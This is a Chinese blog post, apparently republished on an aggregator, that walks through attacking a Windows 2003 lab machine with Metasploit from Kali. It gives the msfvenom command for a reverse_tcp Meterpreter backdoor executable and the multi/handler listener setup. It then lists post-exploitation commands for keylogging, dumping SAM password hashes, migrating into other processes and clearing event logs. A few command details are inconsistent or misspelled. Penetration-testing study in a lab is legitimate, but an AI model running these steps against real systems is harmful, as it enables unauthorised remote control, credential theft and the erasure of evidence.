metasploit渗透第一篇
来源:互联网 发布:php视频推荐 编辑:程序博客网 时间:2024/05/23 20:25
版权声明:本文为博主原创文章,转载必须写明出处。
通过metasploit 框架反弹shell
或许我不是第一个上传metasploit 框架反弹shell的,因为我没有走在最前头,但是我想通过这种方式希望有更多人加入,这样才能学到更多的知识![metasploit 框架](http://book.51cto.com/art/201309/410435.htm)
接下来我通过kali实现对win2003的渗透:
步骤流程:
- kali生成后门
- win 2003运行后门
- 监听后门
- 进入后门
- 操作靶机
Hosts: kali查看连接靶机
渗透机:kali ip:192.168.254.100
靶机:win 2003 ip:192.168.254.101
1.文件目录:C://user/metasploit/
a)config:配置文件目录:basedate.b 数据库文件
b)modules:模块文件
2.msfvenom
msfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线
metasploit-framework旗下的msfpayload(荷载生成器),msfencoder(编码器),msfcli(监听接口)已然成为历史,取而代之的是msfvenom。
一,msfvenom生成payload的常见格式为:
> root@localhost:~# msfvenom -h > root@localhost:~# msfvenom -l> payloads 载荷列表 > root@localhost:~# msfvenom -l encoders> root@localhost:~# msfvenom -l nops
nops选项(空字段模块/一切为了绕过和免杀)
二,以反弹回meterpreter会话的payload为例:window/meterpreter/reverse_tcp
打开命令行:
> msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101> LPORT=4444 -f exe -o payload.exe
LHOST=192.168.1.101:渗透机ip
LPORT=4444:监听端口
-p:指定载荷
-o:输出参数可以用“>”号代替 ,生成文件
-f:指定格式参数
3.msfconsole本地监听
把生成的payload.exe放到下win 2003执行.
root # msfconsole本机监听,因为之前用的是reverse_tcp,所以设置如下root # msf > use exploit/multi/handlermsf exploit(handler) > show payloads载荷列表,所有的载荷都在里面msf11exploit(handler) > set payload windows/meterpreter/reverset_tcp设置载荷msf exploit(handler) > show options查看可设置参数msf exploit(handler) > set lhost 192.168.254.100选择监听ipmsf exploit(handler) > set lport 4444选择监听端口msf exploit(handler) > exploit开启监听Jobs:退出监听msf exploit(handler) > sessions -l 查看已经成功获取的会话msf exploit(handler) > sessions -i 1 连接到指定序号的meterpreter会话已继续利用
4.Metasploit成功拿到shell后门
当我们成功拿到shell后门时,我们会发现我们的命令会进入meterpreter > 而不是msf exploit(handler) >,这时我们就能简单的操作对方的主机了,比如:
sysinfo 显示目标系统信息backround 退出目标系统,回到Metasploit主界面ps 显示目标系统上的进程keyscan_start 监控目标系统键盘输入,停止监控为keyscan_stopMigrate 将你的Meterpreter移到另一个进程先用PS命令查看进程后,得到进程ID,然后在执行Migrate (进程ID)Ipconfig 显示对方网络信息Getuid 获取用户的服务器运行Shell 进入目标电脑,命令提示符Idletime 目标电脑闲置了多长时间Hashdump 导出对方SAM数据库里的内容Clearev 清除事件日志netstat -ano 查看开启端口[Metasploit的基本命令](http://www.91ri.org/8476.html)
metasploit渗透第二篇
阅读全文
0 0
- metasploit渗透第一篇
- Metasploit渗透
- Metasploit渗透工具介绍
- Metasploit渗透测试指南
- metasploit常用渗透命令
- Metasploit portfwd跳板渗透
- Metasploit渗透测试指南
- metasploit 首次渗透测试
- Metasploit渗透学习日记
- metasploit渗透测试笔记
- Metasploit进行渗透windows7
- metasploit之客户端渗透
- Metasploit渗透测试【进阶】
- metasploit渗透测试
- metasploit渗透第二篇
- metasploit渗透第三篇
- Metasploit渗透技巧:后渗透Meterpreter代理
- Metasploit渗透技巧:后渗透Meterpreter代理
- java日常学习:练习作业Frame(QQ登录界面)、按钮及其添加颜色
- 多线程基础之五:Windows API提供的mutex和semaphore性能比较
- HDOJ 1678 Shopaholic
- 647. Palindromic Substrings
- ubuntu 16.04上运行tensor flow 指定gpu
- metasploit渗透第一篇
- Extjs3.0角色权限管理系统-菜单列表模块篇
- 牛客练习赛6A&D
- JavaHibernate----一级缓存以及表的关系
- thinkphp5.0路由匹配规则失效
- Win10环境下Python入门(二)pip升级、换源、第三方包安装
- 问题:Tomcat在eclipse里面能正常启动,而在浏览器中访问http://localhost:8080/不能访问,且报404错误
- 对伪元素::after和::before的理解
- 我的電路實踐